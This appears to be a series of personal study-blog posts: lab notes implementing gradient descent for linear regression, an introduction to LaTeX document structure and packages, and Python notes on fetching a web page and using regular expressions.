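$$\frac{\partial J(w,b)}{\partial w} = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} 2\,(f_{w,b}(x^{(i)}) - y^{(i)})\,x^{(i)} = \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)})\,x^{(i)}$$

since $\frac{\partial}{\partial w}\left(wx^{(i)}+b\right) = x^{(i)}$, and the factor of 2 cancels the $\frac{1}{2}$ built into the cost. Taking $\frac{\partial}{\partial b}\left(wx^{(i)}+b\right) = 1$ instead gives equation (5).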

Here, simultaneously means that you calculate the partial derivatives for all the parameters before updating any of the parameters.
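In code, that ordering looks like the sketch below (using the compute_gradient function implemented in the next section); the point is that dj_dw and dj_db are both computed from the old w and b before either parameter moves:

# simultaneous update: both gradients are evaluated at the current (w, b) ...
dj_dw, dj_db = compute_gradient(x_train, y_train, w, b)
w = w - alpha * dj_dw   # ... and only then are the parameters changed
b = b - alpha * dj_db
# updating w before computing the gradient for b would be the non-simultaneous (wrong) version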

Implement Gradient Descent

You will implement the gradient descent algorithm for one feature. You will need three functions:

• compute_gradient implementing equations (4) and (5) above
• compute_cost implementing equation (2) above (code from the previous lab)
• gradient_descent, utilizing compute_gradient and compute_cost

Conventions:

• The naming of Python variables containing partial derivatives follows this pattern: $\frac{\partial J(w,b)}{\partial b}$ will be dj_db.
• w.r.t is With Respect To, as in the partial derivative of $J(w,b)$ With Respect To $b$.

    compute_gradient


    compute_gradient implements (4) and (5) above and returns $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$. The embedded comments describe the operations.


def compute_gradient(x, y, w, b):
    """
    Computes the gradient for linear regression
    Args:
      x (ndarray (m,)): Data, m examples
      y (ndarray (m,)): target values
      w,b (scalar)    : model parameters
    Returns
      dj_dw (scalar): The gradient of the cost w.r.t. the parameter w
      dj_db (scalar): The gradient of the cost w.r.t. the parameter b
    """

    # Number of training examples
    m = x.shape[0]
    dj_dw = 0
    dj_db = 0

    for i in range(m):
        f_wb = w * x[i] + b
        dj_dw_i = (f_wb - y[i]) * x[i]
        dj_db_i = f_wb - y[i]
        dj_db += dj_db_i
        dj_dw += dj_dw_i
    dj_dw = dj_dw / m
    dj_db = dj_db / m

    return dj_dw, dj_db
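A quick check at the initial parameters (a scratch cell); the values agree with the Iteration 0 line printed by gradient_descent further below:

tmp_dj_dw, tmp_dj_db = compute_gradient(x_train, y_train, 0, 0)
print(tmp_dj_dw, tmp_dj_db)

-650.0 -400.0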


    The lectures described how gradient descent utilizes the partial derivative of the cost with respect to a parameter at a point to update that parameter.
    Let’s use our compute_gradient function to find and plot some partial derivatives of our cost function relative to one of the parameters, $w_0$.


    plt_gradients(x_train,y_train, compute_cost, compute_gradient)
    plt.show()


    Above, the left plot shows $\frac{\partial J(w,b)}{\partial w}$ or the slope of the cost curve relative to $w$ at three points. On the right side of the plot, the derivative is positive, while on the left it is negative. Due to the ‘bowl shape’, the derivatives will always lead gradient descent toward the bottom where the gradient is zero.


    The left plot has fixed $b=100$. Gradient descent will utilize both $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ to update parameters. The ‘quiver plot’ on the right provides a means of viewing the gradient of both parameters. The arrow sizes reflect the magnitude of the gradient at that point. The direction and slope of the arrow reflects the ratio of $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ at that point.
    Note that the gradient points away from the minimum. Review equation (3) above. The scaled gradient is subtracted from the current value of $w$ or $b$. This moves the parameter in a direction that will reduce cost.


Gradient Descent

    Now that gradients can be computed, gradient descent, described in equation (3) above can be implemented below in gradient_descent. The details of the implementation are described in the comments. Below, you will utilize this function to find optimal values of $w$ and $b$ on the training data.


def gradient_descent(x, y, w_in, b_in, alpha, num_iters, cost_function, gradient_function):
    """
    Performs gradient descent to fit w,b. Updates w,b by taking
    num_iters gradient steps with learning rate alpha

    Args:
      x (ndarray (m,))  : Data, m examples
      y (ndarray (m,))  : target values
      w_in,b_in (scalar): initial values of model parameters
      alpha (float)     : Learning rate
      num_iters (int)   : number of iterations to run gradient descent
      cost_function     : function to call to produce cost
      gradient_function : function to call to produce gradient

    Returns:
      w (scalar): Updated value of parameter after running gradient descent
      b (scalar): Updated value of parameter after running gradient descent
      J_history (list): History of cost values
      p_history (list): History of parameters [w,b]
    """

    w = copy.deepcopy(w_in)  # avoid modifying global w_in
    # Arrays to store cost J and w at each iteration, primarily for graphing later
    J_history = []
    p_history = []
    b = b_in
    w = w_in

    for i in range(num_iters):
        # Calculate the gradient and update the parameters using gradient_function
        dj_dw, dj_db = gradient_function(x, y, w, b)

        # Update parameters using equation (3) above
        b = b - alpha * dj_db
        w = w - alpha * dj_dw

        # Save cost J at each iteration
        if i < 100000:  # prevent resource exhaustion
            J_history.append(cost_function(x, y, w, b))
            p_history.append([w, b])
        # Print cost at intervals 10 times, or every iteration if num_iters < 10
        if i % math.ceil(num_iters/10) == 0:
            print(f"Iteration {i:4}: Cost {J_history[-1]:0.2e} ",
                  f"dj_dw: {dj_dw: 0.3e}, dj_db: {dj_db: 0.3e} ",
                  f"w: {w: 0.3e}, b:{b: 0.5e}")

    return w, b, J_history, p_history  # return w and the J,w history for graphing
# initialize parameters
w_init = 0
b_init = 0
# some gradient descent settings
iterations = 10000
tmp_alpha = 1.0e-2
# run gradient descent
w_final, b_final, J_hist, p_hist = gradient_descent(x_train, y_train, w_init, b_init, tmp_alpha,
                                                    iterations, compute_cost, compute_gradient)
print(f"(w,b) found by gradient descent: ({w_final:8.4f},{b_final:8.4f})")

Iteration    0: Cost 7.93e+04  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  6.500e+00, b: 4.00000e+00
Iteration 1000: Cost 3.41e+00  dj_dw: -3.712e-01, dj_db:  6.007e-01   w:  1.949e+02, b: 1.08228e+02
Iteration 2000: Cost 7.93e-01  dj_dw: -1.789e-01, dj_db:  2.895e-01   w:  1.975e+02, b: 1.03966e+02
Iteration 3000: Cost 1.84e-01  dj_dw: -8.625e-02, dj_db:  1.396e-01   w:  1.988e+02, b: 1.01912e+02
Iteration 4000: Cost 4.28e-02  dj_dw: -4.158e-02, dj_db:  6.727e-02   w:  1.994e+02, b: 1.00922e+02
Iteration 5000: Cost 9.95e-03  dj_dw: -2.004e-02, dj_db:  3.243e-02   w:  1.997e+02, b: 1.00444e+02
Iteration 6000: Cost 2.31e-03  dj_dw: -9.660e-03, dj_db:  1.563e-02   w:  1.999e+02, b: 1.00214e+02
Iteration 7000: Cost 5.37e-04  dj_dw: -4.657e-03, dj_db:  7.535e-03   w:  1.999e+02, b: 1.00103e+02
Iteration 8000: Cost 1.25e-04  dj_dw: -2.245e-03, dj_db:  3.632e-03   w:  2.000e+02, b: 1.00050e+02
Iteration 9000: Cost 2.90e-05  dj_dw: -1.082e-03, dj_db:  1.751e-03   w:  2.000e+02, b: 1.00024e+02
(w,b) found by gradient descent: (199.9929,100.0116)

Take a moment and note some characteristics of the gradient descent process printed above.

• The cost starts large and rapidly declines, as described in the slide from the lecture.
• The partial derivatives, dj_dw and dj_db, also get smaller, rapidly at first and then more slowly. As shown in the diagram from the lecture, as the process nears the ‘bottom of the bowl’, progress is slower due to the smaller value of the derivative at that point.
• progress slows, even though the learning rate, alpha, remains fixed

Cost versus iterations of gradient descent

A plot of cost versus iterations is a useful measure of progress in gradient descent. Cost should always decrease in successful runs. The change in cost is so rapid initially that it is useful to plot the initial descent on a different scale than the final descent. In the plots below, note the scale of cost on the axes and the iteration step.

    # plot cost versus iteration  
    fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True, figsize=(12,4))
    ax1.plot(J_hist[:100])
    ax2.plot(1000 + np.arange(len(J_hist[1000:])), J_hist[1000:])
    ax1.set_title("Cost vs. iteration(start)"); ax2.set_title("Cost vs. iteration (end)")
    ax1.set_ylabel('Cost') ; ax2.set_ylabel('Cost')
    ax1.set_xlabel('iteration step') ; ax2.set_xlabel('iteration step')
    plt.show()


Predictions

Now that you have discovered the optimal values for the parameters $w$ and $b$, you can use the model to predict housing values based on the learned parameters. As expected, the predicted values are nearly the same as the training values for the same housing. Further, the prediction for a size not in the training set is in line with the expected value.

print(f"1000sqft house prediction {w_final*1.0 + b_final:0.1f} Thousand dollars")
print(f"1200sqft house prediction {w_final*1.2 + b_final:0.1f} Thousand dollars")
print(f"2000sqft house prediction {w_final*2.0 + b_final:0.1f} Thousand dollars")

1000sqft house prediction 300.0 Thousand dollars
1200sqft house prediction 340.0 Thousand dollars
2000sqft house prediction 500.0 Thousand dollars

    Plotting

    You can show the progress of gradient descent during its execution by plotting the cost over iterations on a contour plot of the cost(w,b).


    fig, ax = plt.subplots(1,1, figsize=(12, 6))
    plt_contour_wgrad(x_train, y_train, p_hist, ax)


Above, the contour plot shows the $cost(w,b)$ over a range of $w$ and $b$. Cost levels are represented by the rings. Overlaid, using red arrows, is the path of gradient descent. Here are some things to note:

• The path makes steady (monotonic) progress toward its goal.
• initial steps are much larger than the steps near the goal.

Zooming in, we can see the final steps of gradient descent. Note the distance between steps shrinks as the gradient approaches zero.

    fig, ax = plt.subplots(1,1, figsize=(12, 4))
    plt_contour_wgrad(x_train, y_train, p_hist, ax, w_range=[180, 220, 0.5], b_range=[80, 120, 0.5],
    contours=[1,5,10,20],resolution=0.5)


    Increased Learning Rate


In the lecture, there was a discussion related to the proper value of the learning rate, $\alpha$, in equation (3). The larger $\alpha$ is, the faster gradient descent will converge to a solution. But if it is too large, gradient descent will diverge. Above you have an example of a solution which converges nicely.

Let’s try increasing the value of $\alpha$ and see what happens:

    # initialize parameters
    w_init = 0
    b_init = 0
    # set alpha to a large value
    iterations = 10
    tmp_alpha = 8.0e-1
    # run gradient descent
    w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
    iterations, compute_cost, compute_gradient)
Iteration    0: Cost 2.58e+05  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  5.200e+02, b: 3.20000e+02
Iteration    1: Cost 7.82e+05  dj_dw:  1.130e+03, dj_db:  7.000e+02   w: -3.840e+02, b:-2.40000e+02
Iteration    2: Cost 2.37e+06  dj_dw: -1.970e+03, dj_db: -1.216e+03   w:  1.192e+03, b: 7.32800e+02
Iteration    3: Cost 7.19e+06  dj_dw:  3.429e+03, dj_db:  2.121e+03   w: -1.551e+03, b:-9.63840e+02
Iteration    4: Cost 2.18e+07  dj_dw: -5.974e+03, dj_db: -3.691e+03   w:  3.228e+03, b: 1.98886e+03
Iteration    5: Cost 6.62e+07  dj_dw:  1.040e+04, dj_db:  6.431e+03   w: -5.095e+03, b:-3.15579e+03
Iteration    6: Cost 2.01e+08  dj_dw: -1.812e+04, dj_db: -1.120e+04   w:  9.402e+03, b: 5.80237e+03
Iteration    7: Cost 6.09e+08  dj_dw:  3.156e+04, dj_db:  1.950e+04   w: -1.584e+04, b:-9.80139e+03
Iteration    8: Cost 1.85e+09  dj_dw: -5.496e+04, dj_db: -3.397e+04   w:  2.813e+04, b: 1.73730e+04
Iteration    9: Cost 5.60e+09  dj_dw:  9.572e+04, dj_db:  5.916e+04   w: -4.845e+04, b:-2.99567e+04

Above, $w$ and $b$ are bouncing back and forth between positive and negative, with the absolute value increasing with each iteration. Further, each iteration $\frac{\partial J(w,b)}{\partial w}$ changes sign and cost is increasing rather than decreasing. This is a clear sign that the learning rate is too large and the solution is diverging.
Let’s visualize this with a plot.
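A simple guard you could wrap around the same update step (a sketch, not part of the lab): watch the cost and stop as soon as it rises.

w, b = 0, 0
prev_cost = float("inf")
for i in range(10):
    dj_dw, dj_db = compute_gradient(x_train, y_train, w, b)
    w, b = w - tmp_alpha * dj_dw, b - tmp_alpha * dj_db
    cost = compute_cost(x_train, y_train, w, b)
    if cost > prev_cost:              # cost increased: the run is diverging
        print(f"diverging at iteration {i}; reduce alpha")
        break
    prev_cost = cost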

    plt_divergence(p_hist, J_hist,x_train, y_train)
    plt.show()
---------------------------------------------------------------------------
OverflowError                             Traceback (most recent call last)
Input In [16], in <cell line: 1>()
----> 1 plt_divergence(p_hist, J_hist,x_train, y_train)
      2 plt.show()

File ~\Jupyter\吴恩达-ML\week1\work\lab_utils_uni.py:305, in plt_divergence(p_hist, J_hist, x_train, y_train)
    303 for i in range(len(w_array)):
    304     tmp_w = w_array[i]
--> 305     cost[i] = compute_cost(x_train, y_train, tmp_w, fix_b)
    307 ax.plot(w_array, cost)
    308 ax.plot(x,v, c=dlmagenta)

OverflowError: Python int too large to convert to C long


    Above, the left graph shows $w$'s progression over the first few steps of gradient descent. $w$ oscillates from positive to negative and cost grows rapidly. Gradient Descent is operating on both $w$ and $b$ simultaneously, so one needs the 3-D plot on the right for the complete picture.


    Congratulations!

    In this lab you:

    • delved into the details of gradient descent for a single variable.
    • developed a routine to compute the gradient
    • visualized what the gradient is
    • completed a gradient descent routine
    • utilized gradient descent to find parameters
    • examined the impact of sizing the learning rate

/posts/Latex-%E5%88%98%E6%B5%B7%E6%B4%8B-LaTeX%20%E4%B8%8D%E5%BF%AB%E9%80%9F%E7%9A%84%E5%85%A5%E9%97%A8/

Lecture notes

Reference site

Course

Part 1: Organizing the Document Structure

What does a document consist of?

• Title
• Preface / abstract
• Table of contents
• Body
  • Parts, chapters, sections, paragraphs
    • Text, formulas
    • Lists: numbered, unnumbered, with headings
    • Theorems, lemmas, propositions, proofs, conclusions
    • Poetry, quotations, program code, algorithm pseudocode
    • Tables
    • Figures
• Bibliography
• Index, glossary

Outline first, details follow

$\LaTeX$ supports a structured way of writing documents. The steps:

• Decide on the topic
• List an outline
• Fill in the content
• Adjust the formatting (rather: don’t worry about the formatting)

Other software

• markdown
• LYX: a structured document writing system

Basic structure of a LaTeX document

%%% A simple document
% Preamble: format settings
\documentclass{ctexart}
\usepackage[b5paper]{geometry}
% Body: fill in the content
\begin{document}
使用 \LaTeX
\end{document}

The document environment is the dividing line:

• before the document environment is the preamble;

• inside the environment is the body;

• anything after the environment is ignored.

Formats are set in the preamble; the body then applies them.

Document components

• Title: \title, \author, \date, produced by \maketitle
• Abstract / preface: the abstract environment / \chapter*
• Table of contents: \tableofcontents
• Chapters and sections: \chapter, \section
• Appendix: \appendix + \chapter, \section
• Bibliography: \bibliography
• Index: \printindex

Document divisions

• Large documents:
  • \frontmatter
  • \mainmatter
  • \backmatter
• Ordinary documents:
  • \appendix

Level | Name | Command | Notes
-1 | part | \part | optional top level
0 | chapter | \chapter | top level of the report and book classes
1 | section | \section | top level of the article class: student papers
2 | subsection | \subsection | report, book
3 | subsubsection | \subsubsection | unnumbered and left out of the TOC by default
4 | paragraph | \paragraph | unnumbered and left out of the TOC by default
5 | subparagraph | \subparagraph | unnumbered and left out of the TOC by default

Organizing files on disk

A small document can keep everything in a single place. For larger documents, split the content into multiple files and lay out a directory structure:

• a main document that gives the overall framework
• separate files for the individual chapters
• separate class files and style files for the formatting
• small files to isolate complex figures and tables

Related commands:

• \documentclass: reads a document class file (.cls)
• \usepackage: reads a style file, i.e. a package (.sty)
• \include: starts a new page and reads a chapter file (.tex)
• \input: reads an arbitrary file

Example of a document framework

Part 2: Filling in the Content

LaTeX basics

A belated Hello world.

Find an editor and type:

\documentclass{article}
\begin{document}
Hello world.
\end{document}

Chinese changes almost nothing: replace the \documentclass argument with ctexart (Chinese TeX article) and set the [UTF8] option:

\documentclass[UTF8]{ctexart}
\begin{document}
今天你吃了吗?
\end{document}


Syntax

Compared with the raw $\TeX$ language, $\LaTeX$ restricts the syntax to relatively fixed forms.

• Commands: arguments always follow in braces; optional arguments go in square brackets
• Environments
• Comments: start with a percent sign %

LaTeX macros: commands and environments

• Commands: start with a backslash and take zero or more arguments: \frac{1}{2}: $\frac{1}{2}$
• Environments:

\begin{flushright}  % text inside the environment is right-aligned
content of the environment
\end{flushright}

Body text

A line break in the source is treated as a single space.

To get two paragraphs, leave a blank line (hit Enter twice):

\documentclass{article}
\begin{document}
aa

bb
\end{document}

Text symbols

\S \P \textbullet \textregistered \texttrademark

$\S \P \textbullet \textregistered \texttrademark $

(These do not render in hexo…)

Formulas

Mathematical formulas

In math mode the fonts, symbols, and spacing all differ from body text; every piece of mathematics (including single symbols such as $n$ or $\pi$) must be entered in math mode.

• Inline formulas: wrapped in a pair of $ signs, e.g. $a+b=c$
• Display formulas:
  • simple unnumbered formulas with \[ and \] (do not use the double dollar signs $$ $$; there are subtle differences)
  • basic numbered formulas with the equation environment
  • for more complex structures, the dedicated math environments from the amsmath package (do not use the eqnarray environment)

Mathematical structures

• Superscripts and subscripts: ^ and _
• Over/underlines and braces: \overline, \underline, \overbrace, \underbrace
• Fractions: \frac{numerator}{denominator}
• Radicals: \sqrt[index]{radicand}
• Matrices: the dedicated matrix environments from amsmath: matrix, pmatrix, bmatrix, etc. Particularly complex matrices (e.g. with rules) are drawn as tables with the array environment.

Mathematical symbols

• Math letters $a,b,\alpha,\Delta$, and math fonts \mathbb ($\mathbb R$), \mathcal ($\mathcal P$), etc.
• Ordinary symbols: e.g. \infty ($\infty$), \angle ($\angle$)
• Binary operators: $a+b,a-b,a\oplus b$
• Binary relations: $a=b,a\le b$
• Delimiters: $\left< a,b\right>$, enlarged with \left and \right
• Punctuation: comma, semicolon (\colon)

The symbol class determines the line-breaking behavior and the spacing around the symbol.

amsmath and mathtools

• amsmath is the basic math toolkit; it shows up in almost every document that contains formulas.

• mathtools supplements and strengthens amsmath.

    \documentclass{article}
    \usepackage{amsmath}
    \usepackage{mathtools}
    \begin{document}
    \begin{align*}
    2^5 &= (1+1)^5 \\
    &= \begin{multlined}[t]
    \binom50\cdot 1^5 + \binom51\cdot 1^4 \cdot 1
    + \binom52\cdot 1^3 \cdot 1^2 \\
    + \binom53\cdot 1^2 \cdot 1^3
    + \binom54\cdot 1 \cdot 1^4 + \binom55\cdot 1^5
    \end{multlined} \\
    &= \binom50 + \binom51 + \binom52 + \binom53
    + \binom54 + \binom55
    \end{align*}
    \end{document}


Scientific typesetting

• siunitx (SI units): a one-stop solution for numbers and units

\usepackage{siunitx}
\num{-1.235e96} \\
\SI{299792458}{m/s} \\
\SI{2x7x3.5}{m}

$-1.235\times10^{96}$

$299,792,458 \mathrm{m/s}$

$2\mathrm m\times 7\mathrm m\times 3.5\mathrm m$ (imitated)

\begin{tabular}{|S|}\hline
-234532\\ 13.55 \\ .9e37km \\
\hline
\end{tabular}

• chemformula: typesetting chemical formulas
  • The chemformula package (formerly mhchem) is a model of how to define new syntax rules inside $\TeX$.

\usepackage{chemformula}

It makes chemical equations even easier to write than mathematics; almost everything is done with the single command \ch:

\ch{2 H2 + O2 -> 2H2O}
\ch{2H2O -> 2 H2 ^ + O2 ^}

How to write chemical equations in markdown? - 知乎 (zhihu.com)

$$3 Ca O +Fe_2O_3\stackrel{高温}{==}2 Fe + 3 CO_2$$

$2Fe^{3+} + SO_2 + Ba^{2+} + 2H_2O -> 2Fe^{2+} + BaSO_4\downarrow + 4H^+$

Lists and text blocks

List environments

• enumerate: numbered

\begin{enumerate}
\item aaa
\item bbb
\end{enumerate}

1. aaa
2. bbb
3. ccc

• itemize: unnumbered
• description: with item labels

Theorem-like environments

• Defining a theorem-like environment
  • \newtheorem defines one, e.g.

\newtheorem{thm}{定理}[section]

• Using a theorem-like environment:

\begin{thm}
一个定理
\end{thm}

Poetry and quotations

• verse
• quote
• quotation

Verbatim code

• The \verb command, e.g.

code \verb|#include<stdio.h>|

• The verbatim environment

\begin{verbatim}
#include <stdio.h>
int main(void) {
    printf("hello world.");
    return 0;
}
\end{verbatim}

Advanced code: syntax highlighting

• The listings package

\begin{lstlisting}[language=C,
    basicstyle=\ttfamily,
    stringstyle=\color{blue}]
#include <stdio.h>
int main(void) {
    printf("hello world.");
    return 0;
}
\end{lstlisting}

• The minted package (which calls Pygments)

Algorithms

• The clrscode package (Introduction to Algorithms)

• The algorithm2e package
• The algpseudocode format from the algorithmicx package

Tables, figures, and floats

Tables

Use the tabular environment.

\begin{tabular}{|rr|}
\hline
输入& 输出\\ \hline
$-2$ & 4 \\
0 & 0 \\
2 & 4 \\ \hline
\end{tabular}

Input | Output
-2 | 4
0 | 0
2 | 4

Table code can also be generated with tools, for example:

Create LaTeX tables online – TablesGenerator.com

Table packages for every need

• Cell handling: multirow (merge rows), makecell (split a cell into lines)
• Long tables: longtable (tables that continue onto the next page), xtab
• Fixed-width tables: xtabular
• Rule control: booktabs (three-line tables), diagbox (diagonal split cells), arydshln
• Column formats: array
• All of the above combined: tabu

Including graphics

Use the \includegraphics command from the graphicx package:

\includegraphics[width=2cm]{pkulogo.pdf}

Drawing with code

Prefer external tools for figures, especially visual ones: general vector graphics with Inkscape, Illustrator, or even PowerPoint (saved as PDF); mathematical plots with MATLAB, matplotlib, and the like.
If a suitable package exists, certain kinds of figures can also be drawn with $\LaTeX$ code. Many modern $\LaTeX$ drawing packages are built on TikZ.

Floats

• the figure environment
• the table environment
• other float types can be created with the float package

A float’s caption comes from the \caption command and is numbered automatically.

Automation

Table of contents

How cross-references work
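In miniature, the mechanism is one command pair (an illustrative snippet; the label name is made up): \label writes an anchor into the .aux file on the first run, and \ref or \pageref reads it back on the next run, which is why cross-references need two compilations.

\section{Results}\label{sec:results}
...
As shown in Section~\ref{sec:results} (page~\pageref{sec:results}) ...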

hyperref: links and bookmarks in the PDF

• hyperref produces links and bookmarks by the same principle as ordinary cross-references: it writes the corresponding “anchor” code into the PDF and references it elsewhere. Cross-reference records go into the .aux file, table-of-contents records into the .toc file, and PDF bookmarks get their own .out file.

BibTeX bibliographies

Setting the bibliography style

• Choose a suitable .bst style, e.g. plainnat, gbt7714-plain

• natbib for author-year styles

• Use custom-bib to generate a customized style file

• biblatex + Biber: the new way of handling bibliographies

Part 3: Designing the Document Format

Basic rules

• Separate format from content: don’t fuss over details
• Use content-oriented commands and environments

It is \emph{important}. % recommended
It is \textit{important}. % not recommended

By default the two look the same, but under a different template they may not.

\caption{流程图}  % recommended
\textbf{图 1: } 流程图 % not recommended: it will not be numbered automatically

Using packages

• What they do: packages factor reusable code out, much like “libraries” in other programming languages. With a simple interface a package can implement very complex functionality, some of which would be an “impossible task” for an individual.
• The problem: third-party packages can break the “forward compatibility” that TEX was designed for, and compatibility problems between packages are even harder to resolve. Using packages extends compatibility concerns from the TEX language to all of the package code.

Modern $\LaTeX$ documents cannot do without third-party packages, but use them sensibly:

• try not to reinvent the wheel
• drop the packages you do not use

Format-control features

Fonts and symbols

• Font family
  • \rmfamily, \textrm{…}
  • \sffamily, \textsf{…}
  • \ttfamily, \texttt{…}
• Font size: \Huge, \LARGE, \Large, \large, \normalsize, \small,
  \footnotesize, \scriptsize, \tiny
• Chinese font sizes: \zihao{5} (size 5), \zihao{-3} (small size 3)

Alignment

• Centered: \centering
• Left-aligned: \raggedright
• Right-aligned: \raggedleft

Spacing

• Horizontal: \hspace{2cm}
• Vertical: \vspace{3mm}

Page layout

• geometry
• fancyhdr

Page and line breaking

• \linebreak, \\,
  \pagebreak, \newpage, \clearpage, \cleardoublepage

Boxes

• \mbox{content},
  \parbox{4em}{content}, minipage

Applying formats to the document

Set the formats separately, in the preamble:

• Set the relevant parameters directly: \parindent, \parskip,
  \linespread, \pagestyle
• Redefine selected commands, e.g. \thesection, \labelenumi,
  \descriptionlabel, \figurename
• Use utility packages to do the setup,
• e.g. the ctex package for Chinese formatting, the tocloft package for the table-of-contents format.

Using your own commands and environments

\documentclass{ctexart}

\newcommand\prg[1]{\textsf{#1}}

\begin{document}

程序 \prg{sort} 很有用

\end{document}

Section headings

Float captions

• the caption package

List environments

• the enumitem package
/posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88scraping%EF%BC%89/

Official site

Course

1.1 Understanding the Structure of a Web Page

Viewing the page source

Page to scrape: Scraping tutorial 1 | 莫烦 Python

    <!DOCTYPE html>
    <html lang="cn">
    <head>
    <meta charset="UTF-8">
    <title>Scraping tutorial 1 | 莫烦 Python</title>
    <link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png">
    </head>
    <body>
    <h1>爬虫测试 1</h1>
    <p>
    这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a>
    <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.
    </p>

    </body>
    </html>
from urllib.request import urlopen

html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
).read().decode('utf-8')
# the page contains Chinese characters, so decode it as utf-8
print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>

Prerequisite: Regular Expressions

Tutorial:

A regular expression (RegEx) is a tool for matching characters: it finds the content you need inside a large string. It is used in many places, such as web crawling, document processing, and data filtering.

Here it lets us pick the useful information out of the code read from the browser.

Simple Python matching

pattern1 = "cat"
pattern2 = "bird"
string = "dog runs to cat"
print(pattern1 in string)
print(pattern2 in string)

True
False
Matching with a regular expression

import re

pattern1 = "cat"
pattern2 = "bird"
string = "dog runs to cat"
print(re.search(pattern1, string))
print(re.search(pattern2, string))

<re.Match object; span=(12, 15), match='cat'>
None

The string cat was found at positions 12-15 of string.

Matching several possibilities with []

Two possibilities, run or ran:

ptn = r"r[au]n"  # the r prefix marks a raw pattern string, not a plain string
print(re.search(ptn, "dog runs to cat"))

<re.Match object; span=(4, 7), match='run'>
More character ranges:

print(re.search(r"r[A-Z]n", "dog runs to cat"))  # uppercase letters
print(re.search(r"r[a-z]n", "dag runs to cat"))  # lowercase letters
print(re.search(r"r[0-9]n", "dog r1ns to cat"))  # digits
print(re.search(r"r[0-9a-z]n", "dog runs to cat"))  # digits or lowercase letters

None
<re.Match object; span=(4, 7), match='run'>
<re.Match object; span=(4, 7), match='r1n'>
<re.Match object; span=(4, 7), match='run'>
Built-in character classes

Digits

# \d: matches any digit
print(re.search(r"r\dn", "run r4n"))
# \D: matches any non-digit
print(re.search(r"r\Dn", "run r4n"))

<re.Match object; span=(4, 7), match='r4n'>
<re.Match object; span=(0, 3), match='run'>
Whitespace

# \s: any whitespace, such as \t, \n, \r, \f, \v
print(re.search(r"r\sn", "r\nn r4n"))
# \S: any non-whitespace
print(re.search(r"r\Sn", "r\nn r4n"))

<re.Match object; span=(0, 3), match='r\nn'>
<re.Match object; span=(4, 7), match='r4n'>
Word characters (letters, digits, and the underscore _)

# \w: [a-zA-Z0-9_]
print(re.search(r"r\wn", "r\nn r4n"))
# \W: the opposite of \w
print(re.search(r"r\Wn", "r\nn r4n"))

<re.Match object; span=(4, 7), match='r4n'>
<re.Match object; span=(0, 3), match='r\nn'>
Word boundaries

# \b: a word boundary
print(re.search(r"\bruns\b", "dog runs to cat"))
print(re.search(r"\bruns\b", "dog runsto cat"))
# \B: a non-boundary
print(re.search(r"\Bruns\B", "dog runs to cat"))
print(re.search(r"\Bruns\B", "dogrunsto cat"))

<re.Match object; span=(4, 8), match='runs'>
None
None
<re.Match object; span=(3, 7), match='runs'>
Escapes and the any-character dot

# \\: matches a backslash \
print(re.search(r"runs\\", "runs\ to me"))
# .: matches any character except \n
print(re.search(r"r.ns", "r[ns to me"))

<re.Match object; span=(0, 5), match='runs\\'>
<re.Match object; span=(0, 4), match='r[ns'>
Start and end of a string

# ^: match at the start
print(re.search(r"^dog", "dog runs to cat"))
# $: match at the end
print(re.search(r"cat$", "dog runs to cat"))

<re.Match object; span=(0, 3), match='dog'>
<re.Match object; span=(12, 15), match='cat'>
Optional parts

# ()?: matches whether or not the parenthesized part is present
print(re.search(r"Mon(day)?", "Monday"))
print(re.search(r"Mon(day)?", "Mon"))

<re.Match object; span=(0, 6), match='Monday'>
<re.Match object; span=(0, 3), match='Mon'>
    多行匹配
    # 多行情况下
    string = """
    dog runs to cat.
    I run to dog.
    """
    print(re.search(r"^I", string))
    print(re.search(r"^I", string, flags=re.M)) # 增加 flag 匹配多行
None
<re.Match object; span=(18, 19), match='I'>
Zero or more
# *: matches zero or more occurrences
    print(re.search(r"ab*", "a"))
    print(re.search(r"ab*", "abbbbbbb"))
<re.Match object; span=(0, 1), match='a'>
<re.Match object; span=(0, 8), match='abbbbbbb'>
One or more
# +: matches one or more occurrences
    print(re.search(r"ab+", "a"))
    print(re.search(r"ab+", "abbbbbbb"))
None
<re.Match object; span=(0, 8), match='abbbbbbb'>
A bounded number of times
# {n,m}: matches n to m occurrences (no space allowed after the comma)
    print(re.search(r"ab{2,10}", "a"))
    print(re.search(r"ab{2,10}", "abbbbb"))
None
<re.Match object; span=(0, 6), match='abbbbb'>
Groups with ()
# \d+: one or more digits
# .+: one or more of any character except \n
    match = re.search(r"(\d+), Date: (.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group(1))
    print(match.group(2))
021523, Date: Feb/12/2017
021523
Feb/12/2017
Naming groups with ?P<name>
    match = re.search(r"(?P<id>\d+), Date: (?P<date>.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group("id"))
    print(match.group("date"))
021523, Date: Feb/12/2017
021523
Feb/12/2017
findall: find every match
    print(re.findall(r"r[ua]n", "run ran ren"))
# |: or
print(re.findall(r"r(u|a)n", "run ran ren"))  # note: with a group, findall returns the group contents
    print(re.findall(r"run|ran", "run ran ren"))
['run', 'ran']
['u', 'a']
['run', 'ran']
re.sub: substitution
    print(re.sub(r"r[au]ns", "catches", "dog runs to cat"))
